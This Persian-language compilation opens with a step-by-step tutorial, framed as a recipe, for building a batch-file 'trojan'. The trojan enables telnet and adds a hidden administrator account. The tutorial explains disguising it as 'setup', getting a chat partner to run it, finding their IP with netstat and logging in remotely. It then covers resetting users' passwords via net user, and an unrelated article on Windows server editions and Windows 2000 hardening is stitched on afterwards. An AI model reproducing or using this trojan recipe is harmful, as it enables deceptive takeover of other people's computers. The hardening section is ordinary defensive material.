موادلازم: یک عدد user name و password  .  یک عددIP کامپیوتر طرف وباز بودن پورت 23 کامپیوتر طرف.
طرز تهیه: برای به دست آوردن user name و password و همچنین باز کردن پورت 23 به یک عدد تروجان نیاز داریم که
هم می توانیم از نرم افزار های موجود استفاده کنیم و هم می توانیم خودمان بسازیم
طرز تهیه تروجان : ما این تروجان را با فایل bat می سازیم که اگر با فایل های bat اشنایی دارید که فبها المراد در غیر این صورت
باید این توضیح را عرض کنم که این فایل ها با پسوندbat ذخیره شده و می توانند دستورات را در محيط cmd اجرا کنند.
خب ! حال می توانید notepad را باز کنید و دستورات زیر را در آن تایپ کنید.

echo off@
net start telnet 23
net user home "hello" /add
net localgroup administrators home /add
(شما از سمت چپ تراز کنيد)
سپس با پسوند bat ذخیره میکنیم.
دستور اول باعث خاموش شده اکو میشود. یعنی دستورات دیده نشده و فقط نتیجه ان دیده می شود.
دستور دوم پورت 23 کامیوتر را باز میکند که باز بودن ابن پورت باعث می شودکه بتوان بعد از وارد شدن هم حذف و هم اضافه کنیم.
دستور سوم کاربری با نام home و با پسورد hello در کامپیوتر طرف می سازد.
و دستور آخر کاربر home را از گروه Administrator معرفی میکند.
حال برای این که این دستورات دیده نشوند می توان از برنامه bat2com استفاده نمود که فایل مذکور را به پسوندcom تبديل می کند.
.حالا برای این که تابلو نشود میتوان نام ان را setup قرار دهیم.حالا این تروجان اماده است.
اگر برنامه bat2com را نداريد می توانید ایمیل بزنید.
مرحله بعد بدست اوردن ای پی طرف است که این کار یک کمی مشکل است اما ...
برای بدست اوردن ان می توان در هنگام چت با طرف تمام پنجره ها را بست مگر پنجره چت با طرف سپس cmd را باز کرده و دستور زیر را وارد کرده و اینتر را بزنید.

netstat -n
در قسمت foriegn ادرس IP یارو است مثلا 127.0.0.1 بدست امده است.
حالا باید فایل را فرستاده و طرف ان را اجرا کند.
الان همه چیز اماده است.
برای وارد شدن به کامپیوتر يارو cmd را باز کرده و دستور زیر را وارد می کنیم.

telnet 127.0.0.1 23
پیغام زیر ظاهر می گردد

Welcome to Microsoft Telnet Client
Escape Character is 'CTRL+]'
You are about to send your password information to a remote computer in Internet
zone. This might not be safe. Do you want to send anyway(y/n):
no را تايپ کرده و اينتر را میزنیم پیغام زیر ظاهر می گردد

Welcome to Microsoft Telnet Service
Login:
حالا username (که در مثال بالا home بود)را وارد کرده و اینتر میزنیم
سپس password (که در بالا hello بود) را زده و اینتر میزنیم
حالا پیغام زیر ظاهر میگردد که نشان می دهد ما در کامپیوتر طرف هستیم.

طریقه ایجاد وحذف و تغییر  کابر توسط Cmd:

برای ایجاد یک کاربر جدید میتوان از دستور زیر استفاده کرد.

net user [username] "[password]" /add

به عنوان مثال دستورات زیر باعث ایجاد یک کاربر به نامhome  با پسورد hello می شود.

net user home "hello" /add

همچنین می توان پسورد کاربرهای قبلی را نیز تغییر داد.و به داشتن پسورد قبلی نیازی نیست.این کاربر ها باید و جود داشته باشند.

دستور زیر باعث تغییر پسورد کاربر home به abcd ميشود.

"net user home "abcd

همچنين برای برداشتن پسورد بايد  ""  را به جای پسورد گذاشت.مثال a

برای حذف کاربر نيز بايد از سوييچ del / استفاده نمود.مثال b

"" a) net user home

b) net user home /del

برای تغيير پسورد administrator ميتوان از دستورات بالا استفاده نمود و به جای user name بايد administrator را وارد نمود.

جلوگیری از تغییر کلمه عبور توسط cmd :

کسانی که با دستورات net اشنايی دارند حتما بر اين موضوع واقفند که اين دستور از قابلیت های بسیاری برخوردار است به طوری که با این دستور می توان کلمه عبور را بدون داشتن رمز قبلی تغییر داد.

برای این که نتواند کسی کلمه عبور شما را از این طریق تغییر دهد می توانید از طريق گزينه زير وارد شده

Control Panel/Performance and Maintenance/Administrative Tools/Local Security Policy/Account Policies/Password Polici/Password must meet complexity requirements

و این گزینه که به طور پیش فرض غیر فعال است را فعال نمایید.به اين ترتيب ديگر کسی نمی تواند از طريق Cmd کلمه عبور شما را عوض نمايد.(قابل توجه اقای x که password خودش رو عوض کرد و انداخت تقصير يکی ديگه).

تنظیم ساعت کار ویندوز با Cmd:

برای این کهwindows  شما در ساعاتی مشخص از هفته قابل استفاده باشد و در ساعات دیگر کسی نتواند از ان استفاده نماید می توانید از دستور زیر استفاده کنید.

,.,[Net user [username] /time:[day,start time[am|pm]-end time[am|pm

به عنوان مثال این دستورات       ;net user home /time:f,10am-10pm;w,5am-7am

کاربری با نام  home    را در ر روزهای جمعه از ساعت 10 صبح تا 10 شب و روز های جهارشنبه از ساعت 5 صبح تا 7 صبح فعال می کند.

لازم به ذکر است که غیر فعال بودن ان به اين معنی است که نام انهادر Welcome screen ظاهر میگردد اگر ساعات ان غیر مجاز باشد کادر پسورد میاید که هیچ کس از ان اطلاعی ندارد در غیر این صورت وارد ان میشود.

همچنین روزهای هفته باید به صورت زیر در فرمان ظاهر گردند   جمعه f, شنبه  sa    , یکشنبه su  , دوشنبه   m  ,سه شنبه  t   ,چهار شنبه  w , پنج شنبه  th.

برای باز گرداندن به حالت اولیه میتوانید از دستور زیر استفاده کنید

Net user [username] /time:all

که به جای  user name باید نام کابری خود را وارد کنید.

طريقه گرفتن Export از شاخه های رجيستری توسط Cmd :

برای اين کار ميتوانيد از دستور زير استفاده کنيد.      reg export KeyName FileName

به جای KeyName نام شاخه ای که می خواهيد از ان Export  تهيه کنيد را بنويسيد و به جای  FileName مسير و نام فايل را قرار می دهيد.

به عنوان مثال دستورات زير از شاخه

[HKEY_CURRENT_USER\Software\Microsoft\winmine]

فايلی با نام min.reg در درايو: D  می سازد.

reg export "hkcu\software\microsoft\winmine" d:\min.reg

همچنين به جای شاخه های اصلی بايد معادل های ان را به کار برد.

HKEY_CLASSES_ROOT]     :   hkcr]
HKEY_CURRENT_USER]     :   hkcu]
HKEY_LOCAL_MACHINE]   :   hklm]
HKEY_USERS]                   :   hku]
HKEY_CURRENT_CONFIG] :   hkcc]

همچنين ميتوانيد عمليات reg copy , reg delete , غيره را بر روی رجيستری انجام دهيد.برای اطلاعات بيشتر به Help ويندوز مراجعه کنيد.

 

ماکروسافت و سيستم عامل ويندوز دارای يک تاريخچه طولانی می باشند . ويندوز در ابتدا بعنوان يک محيط گرافيکی عملياتی ارائه گرديد . مهمترين ويژگی ويندوز در آن دوران ، ارائه پتانسيل ها ی لازم بهمراه انعطاف مناسب در مقايسه با سيستم عامل MS-DOS ، بود . ويندوز ، بسرعت رشد و درادامه نسخه های متفاوتی از آن در اختيار کاربران قرار گرفت . ماکروسافت ، اولين نسخه مبتنی بر سرويس دهنده ويندوز را در سال 1990 و با نام Windows NT 3.1 ؛ ارائه نمود. بتدريج و طی ساليان بعد ( تقريبا" هر دو سال يک نسخه ) ، نسخه های متفاوتی از ويندوز عرضه گرديد . در حال حاضر ما شاهد نسخه های متفاوت سرويس دهنده 2000 ويندوز و نسخه های بعد از آنان يعنی خانواده سرويس دهنده Windows .NET ، می باشيم .
در طی ساليان گذشته ، ماکروسافت نسخه های متفاوتی از سيستم های عامل سرويس دهنده را بمنظور تامين نياز های کاربران طراحی و ارائه نموده است . اولين نسخه جديد در اين رابطه به معرفی نسخه Windows NT Server 4.0 ( نسخه Enterprise ) بر می گردد . بدعت ماکروسافت در ارائه ويرايش های متفاوت برای محيط های خاص ادامه يافت و وهمانگونه که می دانيد در ويندوز 2000 ، ما شاهد ارائه سه نسخه متفاوت ( نسخه سرويس دهنده ) و در Windows .NET Server 2003 ، ما شاهد ارائه چهار نسخه متفاوت در اين زمينه می باشيم . شناخت پتانسيل های هر نسخه بهمراه تفاوت موجود بين هريک از آنان ، در زمان طراحی و بکارگيری هر محيطی که از سرويس دهندگان NET Enterprise. ، استفاده می کند ، بسيار حائز اهميت خواهد بود. سرويس دهندگان NET Enterprise . ، که تعداد آنان به ده می رسد ، مسئول ارائه سرويس های اساسی در محيط های مبتنی بر ويندوز می باشند . هر يک از نسخه های ويندوز 2000 و NET Server . ، مجموعه ای از تکنولوژی های اساسی را ارائه داده که سرويس دهندگان NET Enterprise ، با آنان مرتبط خواهند شد ( از خدمات آنان بنوعی استفاده و خود مظهر يک سرويس و خدمات جديد برای کاربران خواهند بود) . در اين راستا لازم است که در ابتدا با ماهيت و توانائی های هر يک از نسخه های ويندوز که بنوعی زيربناء اوليه را برای سرويس دهندگان NET Enterprise . ، ارائه می دهند آشنا و در مرحله بعد با سرويس ها و تکنولوژی های اساسی ارائه شده توسط سسيتم عامل ويندوز ( نسخه های سرويس دهنده 2000 , 2003 ) نيز آشنا و در نهايت نحوه استفاده و ارتباط سرويس دهندگان NET Enterprise. با پتانسيل های ارائه شده توسط ويندوز را مورد مطالعه و بررسی قرار دهيم . در اولين بخش از مقالات فوق ، به بررسی توانائی و تفاوت بين هر يک از نسخه های ويندوز ( خانواده سرويس دهندگان 2000 و خانواده NET Server 2003 . ) ، خواهيم پرداخت .
خانواده Windows 2000 Server
سرويس دهندگان NET Enterprise . ، بر خلاف نام خود که ممکن است اين تصور را ايجاد نمايند که صرفا" نيازمند استفاده از Windows .NET Server 2003 می باشند ، می توانند بر روی خانواده بزرگ Windows 2000 Server اجراء گردند. لازم به يادآوری است که برخی از سرويس دهندگان NET Enterprise . ، نظير Exchange Server 2000 ، بر روی نسخه های Windows .NET Server 2003 ، اجراء نخواهند شد. برخی از سرويس دهندگان موجود NET Enterprise . ، همچنان بر روی نسخه ويندوز NT server 4.0 اجراء می گردند ، اين نوع سرويس دهندگان دارای ويرايش های خاصی می باشند که امکان استفاده از Active Directory را برای آنان فراهم می نمايد . تعداد نرم افزارها و محصولاتی که می توان آنها را بر روی Windows NT اجراء نمود ، بتدريج به سمت صفر ميل خواهد کرد. در اين مقاله فرض می شود که شما حداقل از نسخه Windows 2000 Server ، استفاده می نمائيد.

ويندوز 2000 دارای سه نسخه متفاوت سرويس دهنده است . تعداد نسخه های فوق را می توان از لحاظ فنی به چهار نسخه نيز تعميم داد .( در صورتيکه سيستم عامل سرويس گيرنده Windows 2000 Professional را نيز در نظر بگيريم ) . هر نسخه بمنظور اهدافی خاص طراحی و دارای مجموعه ای ازپتانسيل ها و قابليت های مختص بخود است . سه نسخه متفاوت سرويس دهنده 2000 ، بشرح زير می باشند :

• نسخه استاندارد سرويس دهنده 2000 ، " Windows 2000 Server " ، ناميده می شود. نسخه فوق ، نسخه پايه سيستم عامل بوده و شامل تمامی قابليت ها و پتانسيل های لازم و مورد نياز سرويس دهندگان NET Enterprise . ، است . هر کامپيوتر مبتنی بر سيستم عامل Windows 2000 Server دارای ويژگی هائی نظير : يک کنترل کننده Domain مربوط به Active Directory و سرويس های ارتباطی شبکه است . نسخه فوق ، دارای محدوديت های مختص بخود است . حمايت از حداکثر چهار پردازنده و چهار گيگا بايت حافطه اصلی (RAM) ، نمونه هائی از محدوديت های نسخه فوق ، می باشد . زمانيکه برنامه ها اجراء می گردند به آنها يک فضاء ثابت حافظه و بميزان دو گيگا بايت نسبت داده می شود . در صورتيکه کامپيوتر دارای حافظه فيزيکی کمتری باشد ، سيستم عامل از فضائی بر روی ديسک که Swap file و يا page file ناميده می شود برای ايجاد حافظه مجازی، استفاده می نمايد .
• نسخه دوم ، Windows 2000 Advanced Server است. اين نسخه، شامل تمامی ويژگی ها و پتانسيل های نسخه Windows 2000 Server بعلاوه امکانات اضافه ديگری است . نسخه فوق ، نيز دارای محدوديت های خاص خود است . حمايت از حداکثر هشت پردازنده و هشت گيگابايت حافظه ، نمونه هائی در اين زمينه می باشند . اين نسخه ، تغييراتی را درارتباط با مدل حافظه استفاده شده توسط برنامه ها، ايجاد نموده است . در اين راستا سه گيگابايت ارائه و صرفا" از يک گيگا بايت برای سيستم عامل ، استفاده می شود . بدين ترتيب ، برنامه های بزرگی نظير SQL Serevr ، از مزايای حافظه RAM بخوبی بهره مند خواهند شد . نسخه فوق ، همچنين دارای امکاناتی نظير : کلاسترينگ (Clustering ) و Network Load Balancing Service ، است . با اينکه اکثر سرويس دهندگان NET Enterprise . ، بصورت نسخه Enterprise Edition در دسترس می باشند ، ولی اين بدين مفهوم نيست که آنان نيازمند استفاده از نسخه Advanced Server می باشند . مثلا" Exchange Sever Enterprise Edition ، قادر به اجراء بر روی Windows 2000 Server است ( در چنين حالتی ، نمی توان از امکان کلاسترينگ Exchange استفاده گردد ، مگر اينکه آن را بر روی نسخه Advanced Server نصب نمود ) .
• نسخه جامع و بسيار بزرگ ويندوز 2000 ، Windows 2000 Datacenter Server ناميده می شود. اين نسخه حداکثر شصت و چهار گيگابايت حافظه اصلی (RAM) و سی و دو پردازنده را حمايت می نمايد. نسخه فوق دارای تمامی قابليت های کلاسترينگ نسخه Advanced Server و ساير پتانسيل های استاندارد می باشد. از نسخه فوق ،در محيط هائی با قابليت های محاسباتی و عملياتی بسيار بالا، استفاده می گردد . علاوه بر آمار شگفت انگيز نسخه فوق در رابطه با ميزان حافظه و تعداد پردازنده ، ماکروسافت ادعا نموده است که زمان مفيد ( Uptime ) سيستم عامل فوق ، 99.999 % است . در صورتيکه قصد تهيه اين نسخه ويندوز را داشته باشيد ( بصورت قانونی ! ) و بدنبال قيمت آن می باشيد ، هرگز در اين راه موفق نخواهيد شد. چون شما نمی توانيد نسخه ای از آن را خريداری نمائيد . ماکروسافت، صرفا" نسخه فوق را به توليد کنندگان سخت افزار سرويس دهنده ( معمولا" OEM ناميده شده و اقتباس شده از Original Equipment Manufactures است) عرضه می نمايد . شرکت های توليد کننده ، پيکربند های خاصی را در رابطه با سخت افزار سرويس دهنده انجام و بمنظور سازگاری با DataCenter Server آن را بررسی ، تست و در ادامه سرويس دهندگان فوق ، به شرکت های متقاضی بهمراه سيستم عامل Datacenter Server فروخته می گردد .
  سيستم و نحوه پشتيبانی Datacenter ، نسبت به ساير نسخه های ويندوز نيز متفاوت است . ماکروسافت حمايت فنی مستقيمی در رابطه با نسخه فوق را ارائه نمی دهد. در مقابل ، OEM ، کانال ارتباطی و پشتيبانی لازم را با مشتريان مربوطه ، برقرار خوادهد کرد. يکی از نکات مهم پشتيبانی Datacenter ، عدم مجاز بودن اعمال تغييرات و اصلاح پيکربندی سخت افزار سرويس دهنده ، بدون کسب مجوز لازم از OEM است .

خانواده Windows .NET Server 2003
Windows .NET Server 2003 ، آخرين نسخه های توليد شده در رابطه با محصولات ويندوز شرکت ماکروسافت ، بوده و نسخه بعدی خانواده Windows 2000 ، می باشند. تمام نسخه های Windows .NET Server 2003 ، شامل گزينه های رابط کاربرWindows XP و يا themes نمی باشند . اين بدين علت است که themes نيازمند منابع اضافه ای است و برای يک سرويس دهنده مناسب بنظر نمی رسد ، منابع را صرف انجام چنين عملياتی آنهم در رابطه با بخش رابط کاربر بر روی سرويس دهنده نمايد . بنابراين زمانيکه سيستم را با استفاده از ويندوز 2003 ، برای اولين مرتبه راه اندازی می نمائيد ، از اينترفيس آن تعجب نکنيد .( اينترفيس ويندوز 2000 را در مقابل اينترفيس جديد XP مشاهده ، خواهيد کرد) . خانواده Windows .NET Sever 2003 دارای چهار نسخه متفاوت است :

• Windows .NET Server 2003 ,Web Edition ، يک نسخه مناسب ، سريع و ارزان ! برای پلات فرم مبتنی بر سرويس دهنده وب است .
• Windows .NET Server 2003 ,Standard Edition ، که معادل Windows 2000 Server است .
• Windows .NET Server 2003 ,Enterprise Edition . که معادل Windows 2000 Advanced Sever است .
• Windows .NET Server 2003 ,Datacenter Edition . که معادل Windows 2000 Datacenter Server است .

ماکروسافت ، نام Windows .NET Server 2003 را دو مرتبه قبل از عرضه آن تغيير داده است . ( Windows 2002 به Windows .NET Server و سپس به Windows .NET Server 2003 ) . در ادامه ما همچنان از اسامی کوتاه نظير Windows .NET Standard Server نسبت به نام رسمی Windows .NET Server 2003 Standard Edition ، استفاده خواهيم کرد.

با معرفی Windows .NET Web Server 2003 ، ماکروسافت قانون ( بدعت ) مربوط به انتخاب يک نسخه بمنظور يک کار خاص را تغيير داده است . Windows .NET Standard Sever ، همچنان اولين گزينه برای اکثر برنامه ها است . Enterprise Server ، امکانات مناسبی را در رابطه با حافظه و کلاسترينگ ، اضافه نموده است .نسخه Datacenter همچنان در اختيار OEM گذاشته می شود(همانطور که دررابطه با ويندوز 2000 عمل می گرديد) . Windows .NET Web Server ، يک ايده جديد بوده و هدف آن رقابت در جهت ارائه يک سرويس دهنده وب با قيمت مناسب! با ساير توليدکنندگانی است که محصولات خود را نظير سيستم عامل و يا سرويس دهنده وب، بصورت رايگان در اختيار کاربران قرار می دهند ( لينوکس و Apache نمونه هائی در اين زمينه می باشند) . قطعا" رقابت با توليدکنندگانی که محصول خود را بصورت رايگان در اختيار قرار می دهند ، کار بيسار مشکلی ! بوده و می بايست برای آن تدابير خاصی انديشيده گردد . مثلا" قيمت 1,199 دلار برای هر نسخه از سرويس دهنده Windows 2000 Server ( شامل ده مجوز دستيابی کاربران ) ، يک قيمت رقابتی نمی باشد . Windows .NET Web Server ، بدنبال پرکردن اين خلاء رقابتی است . نسخه فوق در عين حاليکه برخی از ويژگی های ويندوز را ندارد ولی تمامی ويژگی ها و امکانات لازم و مورد نياز يک سرويس دهنده وب را بخوبی و با قيمت پائين ! ارائه می نمايد.
با اينکه تعدادی از سرويس دهندگان NET Enterprise . ، بصورت Enterprise Edition در دسترس می باشند ولی اين بدان مفهوم نيست که آنان به Enterprise Server نياز خواهند داشت . مثلا" SQL Server 2000 Enterprise Edition ، می تواند بر روی Windows .NET Standard Server ، نصب و اجراء گردد . در اين راستا امکان استفاده از SQL Server Clustering ، وجود نخواهد داشت ، مگر اينکه نسخه Windows .NET Enterprise Server ، نصب گردد .
Windows .NET Server ، نسخه های شصت و چهار بيتی خود را بمنظور حمايت از پردازنده جديد Itanium ، شرکت اينتل نيز ارائه نموده است . صرفا" نسخه های Enterprise و Datacenter بصورت 64 بيتی ، ارائه شده اند . کامپيوترهای Itanium که بر روی آنها Windows .NET Enterprise Server اجراء می گردد ، قادر به حمايت از شصت و چهار گيگابايت حافظه اصلی می باشند . بر روی کامپيوترهای فوق در صورتيکه نسخه Datacenter نصب شده باشد ، امکان استفاده از حداکثر 128 گيگابايت حافطه وجود خواهد داشت .
جدول زير تفاوت های موجود بين هر يک از نسخه های Windows .NET Server را نسان می دهد .

Datacenter Server	Enterprise Server	Server	Web Server	ويژگی
4 - way	2-way	خير	خير	کلاسترينگ
بلی	بلی	بلی	محدود	حمايت از VPN
بلی	بلی	بلی	خير	سرويس Internet Authentication
بلی	بلی	بلی	خير	Network bridging
Doamin member or Domain Controller	Doamin member or Domain Controller	Doamin member or Domain Controller	فقط Domain member	حمايت از Active Directory
خير	بلی	خير	خير	حمايت از Metadirectory Service
بلی	بلی	بلی	خير	حمايت از SharePoint team Service
بلی	بلی	بلی	خير	Removable & Remote Storage
بلی	بلی	بلی	خير	Fax Services
بلی	بلی	بلی	خير	Remote Installation Service
بلی	بلی	خير	خير	نسخه 64 بيتی برای کامپيوترهای Itanium
بلی	بلی	خير	خير	Hot -Add memory capacity
بلی	بلی	خير	خير	Internet Connection Firewall
بلی	بلی	بلی	محدود	حمايت از Public Key Infrastructure (PKI)
بلی	بلی	بلی	خير، فقط Remote admin	Terminal Service (Application Server mode)
64 گيگا بايت ------ کامپيوترهای Itanium حداکثر 128 گيگا بايت	32 گيگا بايت ------ کامپيوترهای Itanium حداکثر 64 گيگا بايت	4 گيگا بايت	2 گيگا بايت	حداکثر حافظه اصلی
حداقل : 8 حداکثر : 32	حداقل : 1 حداکثر : 8	حداقل : 1 حداکثر : 2	حداقل : 1 حداکثر : 2	تعداد پردازنده

سيستم عامل ويندوز، يکی از ده ها سيستم عامل موجود در جهان است که مديريت منابع سخت افزاری و نرم افزاری در يک کامپيوتر را برعهده دارد . استفاده از ويندوز بعنوان سيستم عاملی شبکه ای ، همزمان با عرضه NT ، وارد مرحله جديدی گرديد . در ادامه و بدنبال ارائه نسخه های ديگری از ويندوز ، فصل جديدی از بکارگيری سيستم عامل فوق در شبکه های کامپيوتری گشوده گرديد . استفاده از سيستم عامل ويندوز ( نسخه های متفاوت ) در ايران بطرز محسوسی افزايش و هم اينک، در اکثر شبکه های کامپيوتری از سيستم عامل فوق، استفاده می گردد . دامنه استفاده از ويندوز، از شبکه های کوچک سازمانی تا شبکه های بزرگ را شامل و حتی اکثر مراکز ASP ، برای ميزبانی وب سايت ها از گزينه فوق ، بهمراه مجموعه نرم افزارهای مربوطه استفاده می نمايند . با توجه به جايگاه سيستم عامل در کامپيوتر و نقش آنان در برپاسازی يک شبکه مقتدر و ايمن ، لازم است با نگاهی دقيق به ارزيابی امکانات امنيتی آنان پرداخته و پس از شناسائی نقاط آسيب پذير، در اسرع وقت نسبت به برطرف نمودن حفره های امنيتی اقدام لازم صورت گيرد . ما عادت کرده ايم اکثر نرم افزارها را با تنظيمات پيش فرض نصب و در اين راستا از دکمه طلائی Next ، بدفعات استفاده نمائيم! بديهی نصب و پيکربندی مناسب يک سيستم عامل شبکه ای با رويکرد فوق، می تواند اثرات مخربی را در رابطه با حفاظت از اطلاعات در يک سازمان بدنبال داشته باشد . طراحی و پياده سازی يک سيستم ايمنی مناسب در شبکه های کامپيوتری ، يکی از مهمترين چالش های موجود در دنيای گسترده تکنولوژی اطلاعات است . در اين راستا لازم است، سازمان ها و موسسات در اين رابطه با يک هدفمندی خاص بسمت برپاسازی يک محيط ايمن در شبکه های کامپيوتری حرکت نموده و قبل از وقوع هرگونه پيشامد ناگوار اطلاعاتی ، پيشگيری های لازم صورت پذيرد .
با توجه به استفاده گسترده از سيستم عامل ويندوز در ايران ، لازم است به بررسی و ارزيابی امنيتی سيستم عامل فوق پرداخته گردد . شرکت ماکروسافت خود در اين زمينه تلاش های گسترده ای را آغاز و اخيرا" توجه خاصی را به اين مقوله اختصاص و پروژه های بزرگی را بمنظور نيل به يک سيستم عامل شبکه ای ايمن با توجه واقعيت های موجود تعريف و دنبال می نمايد .
شرکت ماکروسافت پس از عرضه نسخه های خاصی از ويندوز و با مشاهده اشکالات و نواقص خصوصا" نواقص امنيتی اقدام به ارائه نرم افزارهای تکميلی بمنظور بهنگام ساری ويندوز می نمايد . Hotfix,Patch و Service pack نمونه های متفاوتی در اين زمينه می باشند . با توجه به نقش نرم افزارهای فوق در صحت عملکرد امنيتی ويندوز ، لازم است در ابتدا به نرم افزارهای فوق اشاره گردد .

Service Pack و HotFix
Service Pack ، يک بهنگام سازی ادواری در رابطه با سيستم عامل بمنظور رفع اشکالات و نواقص موجود است . ماکروسافت برای ويندوز NT 4.0 ( نسخه قبل از ويندوز 2000 با نگرش امکانات شبکه ای ) شش و برای ويندوز 2000 تاکنون ، سه Service Pack متفاوت را ارائه کرده است . بمنظور برطرف نمودن مشکلات احتمالی در فاصله زمانی بين دو service pack ، اقدا م به عرضه Hotfix می گردد. هر service Pack ، شامل تمام hotfix های قبلی نسبت به نسخه service pack قبلی است .
علاوه بر نصب آخرين نسخه های service Pack ، می بايست اقدام به نصب نسخه های hotfix نيز گردد . معمولا" hotfix ، با توجه به شيوع و گسترش يک مسئله خاص (مثلا" يک حمله اينترنتی ) در شبکه ، از طرف شرکت ماکروسافت، ارائه می گردد . با اينکه شرکت ماکروسافت توصيه کرده است در صورت بروز مشکل، اقدام به نصب نسخه های Hotfix گردد، ولی پيشنهاد می گردد که بلافاصله پس از نصب آخرين نسخه Service Pack ، اقدام به نصب تمام نسخه های امنيتی Hotfix مربوطه نيز گردد .
يکی از مهمترين چالش های مديران شبکه ، بهنگام سازی سيستم و نصب آخرين نسخه های Patch است . ماکروسافت در اين راستا ، يک برنامه خاص را بمنظور بررسی وضعيت امنيتی Hotfix ها ، ارائه که مديران شبکه را قادر به پيمايش سرويس دهنده های موجود در شبکه می نمايد ( برنامه Hfnetchk.exe) . برنامه فوق قادر به تشخيص صحت نصب تمام نسخه های Patch در رابطه با ويندوز 2000 و ساير نرم افزارهای سرويس دهنده نظير IIS ، IE و SQL است ( وضعيت موجود را تشخيص و کمبودها را اعلام می نمايد ) . برنامه HFNetChk يک ابزار خط دستوری بوده که مديران شبکه را قادر به بررسی آخرين وضعيت Patch ها در رابطه با تمام کامپيوترهای موجود در شبکه از يک محل مرکزی می نمايد .( مشاهده جزئيات برنامه HFNetChk ) . شرکت ماکروسافت در اين زمينه ، برنامه جامعی را بمنظور بررسی وضعيت سيستم امنيتی ارائه نموده که برنامه Hfnetchk.exe نيز بخشی از آن است ( مشاهده جزئيات و دريافت برنامه Microsoft Baseline Security Analyzer ).

پس از معرفی امکانات موجود برای بهنگام سازی ويندوز و برطرف نمودن مشکلات و مسائل موجود در هر يک از نسخه های ويند وز، در ادامه به بررسی و ارزيابی سيستم امنيتی ويندوز پرداخته و در اين راستا پيشنهاداتی مطرح می گردد.
سنجش امنيت در ويندوز 2000
تاکنون بيش از 400 نقطه آسيب پذير در نسخه های ويندوز 2000 ، NT و برنامه های مرتبط با آنان شناخته شده و نحوه برطرف نمودن آنان مستند شده است . در اين بخش به بررسی برخی از نقاط آسيب پذير اشاره و نحوه برخورد با آنان بيان می گردد. لازم است به اين نکته مهم دقت شود که کاهش برخی از نقاط آسيب پذير در يک شبکه به معنی عرضه يک شبکه ايمن نمی باشد ( تلاشی است در جهت ايمن شدن ) .

• از سيستم فايل NTFS در مقابل FAT استفاده شود . سيستم فايل فوق ، امکان کنترل دستيابی به فايل ها را برخلاف FAT فراهم می نمايد .
• اطلاعات و ميدان عمل اتصالات بی هويت (Anonymous users) ، می بايست به حداقل مقدار خود برسد . يک اتصال بی هويت ( کاربران ناشناس و گمنام ) عضوی از گروه Everyone ( گروه از قبل ايجاد شده ) خواهد بود . بدين ترتيب آنان قادر به دستيابی تمام منابعی خواهند بود ، که برای گروه Everyone مجاز شناخته شده است . ويندوز NT پس از نصب آخرين نسخه ( Servic Pack ( 6a ، اکثر عملياتی را که يک کاربر گمنام قادر به انجام آنها می باشد ، محدود می نمايد . بمنظورر پيشگيری از شمارش اسامی account ها ، توسط کاربران گمنام ، از کليد ريجستری زير بهمراه تتنظيمات مربوطه استفاده می شود .

Hive: HKEY_LOCAL_MACHINE Key: System\CurrentControlSet\Control\Lsa Name: RestrictAnonymous Type: REG_DWORD Value: 1

• امتياز Access this computer from the network را در رابطه با کاربران عضوء گروه Everyone حذف و آن را با گروه معتبر Users ، جايگزين نمائيد . در ويندوز NT 4.0 ، برای انجام عمليات فوق از مسير زير و در ويندوز 2000 از Group Policy و يا Security Configuration Toolset استفاده می شود.

User Manager -> Policies -> User Rights

• امکان دستيابی از راه دور به ريجستری را سلب نمائيد . کليدهای ريجستری متعددی وجود دارد، که اين امکان را به گروه Everyone و بالطبع کاربران ناشناس خواهد داد که از راه دور قادر به ويرايش ريجستری باشند( خواندن و تنظيم مقادير مربوط به مجوزها ). در صورتيکه کاربر تاييد نشده ای ، قادر به ويرايش مقادير موجود در ريجستری گردد، امکان تغيير مقادير موجود و بدست آوردن امتيازات با درجه بالا نيز در اختيار وی قرار خواهد گرفت. توصيه می گردد که صرفا" مديران شبکه و سيستم ، دارای امکان دستيابی از راه دور به ريجستری باشند . بمنظور اعمال محدوديت در رابطه با دستيابی از راه دور به ريجستری ، از کليد زير برای تنظيم مجوزهای امنيتی استفاده می شود .

HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg

• Account مربوط به Guest غير فعال گردد.در اين راستا پيشنهاد می گردد، که تمام Account ها ( سرويس ها و کاربران ) دارای رمز عبورگردند .( صرفنظر از اينکه account فعال و يا غير فعال باشد ) .
• تاييد اعتبار LanMan را غير فعال نمائيد . رمز عبورهای LanMan بمنظور سازگاری با نسخه های قبلی ويندوز ( 9X ) مطرح و عملا" رمزهای عبوری مشابه ويندوز 2000 بوده که تماما" به حروف بزرگ تبديل و با استفاده از يک روش خاص رمز شده اند .رمزهای عبور LanMan ، نسبت به ساير رمزهای عبور بمراتب ساده تر کشف و مورد استفاده متجاوزان اطلاعاتی قرار می گيرند . پيشنهاد می گردد، رمزهای عبور LanMan غير فعال گردند . بمنظور غير فعال نمودن رمزهای عبور فوق ، کليد ريجستری مربوطه ، می بايست مطابق زير تغيير تنظيم گردد .

Hive: HKEY_LOCAL_MACHINE Key: System\CurrentControlSet\Control\Lsa Name: LMCompatibilityLevel Type: REG_DWORD Value: 5

• پورت های 135,137,138 و 139 در محدوده روتر و يا فايروال را غير فعال نمائيد (Colse) . برای شبکه های مبتنی بر ويندوز 2000 ، می بايست پورت 445 نيز بلاک گردد . پورت های فوق، برای شبکه های داخلی لازم بوده ولی برای شبکه های خارجی مورد نياز نخواهند بود . با بلاک نمودن پورت های فوق ، از تعداد حملات متجاوزان اطلاعاتی در شبکه های مبتنی بر ويندوز NT 4.0 و 2000 بنحو چشمگيری کاسته خواهد شد . در اين راستا لازم است ، پروتکل های غير ضروری ( نظير NetBeui و IPX) نيز غير فعال گردند .
• بر روی فولدرها و فايل های سيستمی ويندوز نيز می بايست لايه های امنيتی مناسبی ايجاد گردد. در اين راستا لازم است بر روی فولدرهای حياتی سيستم نظير WINNT و System32 و کليدهای ريجستری HKLM\Software\Microsoft\Windows\Run و HKLM\Software\Microsoft\WindowsNT\CurrentVersion\AEDebug امکان استفاده از گروه Everyone سلب و به گروه معتبر Users ( شامل ليست کاربران مجاز ) اختصاص يابد .
• در رابطه با منابع اشتراکی در شبکه ، می بايست محدوديت های لازم اعمال گردد. زمانيکه منبعی در شبکه به اشتراک گذاشته می شود، کنترل دستيابی بصورت پيش فرض گروه Everyone با امتيازFull control خواهد بود . در اين راستا پيشنهاد می گردد ، امکان استفاده از منابع اشتراکی ، صرفا" در اختيار کاربرانی قرار گيرد که نيازمند دستيابی به منابع فوق، می باشند .
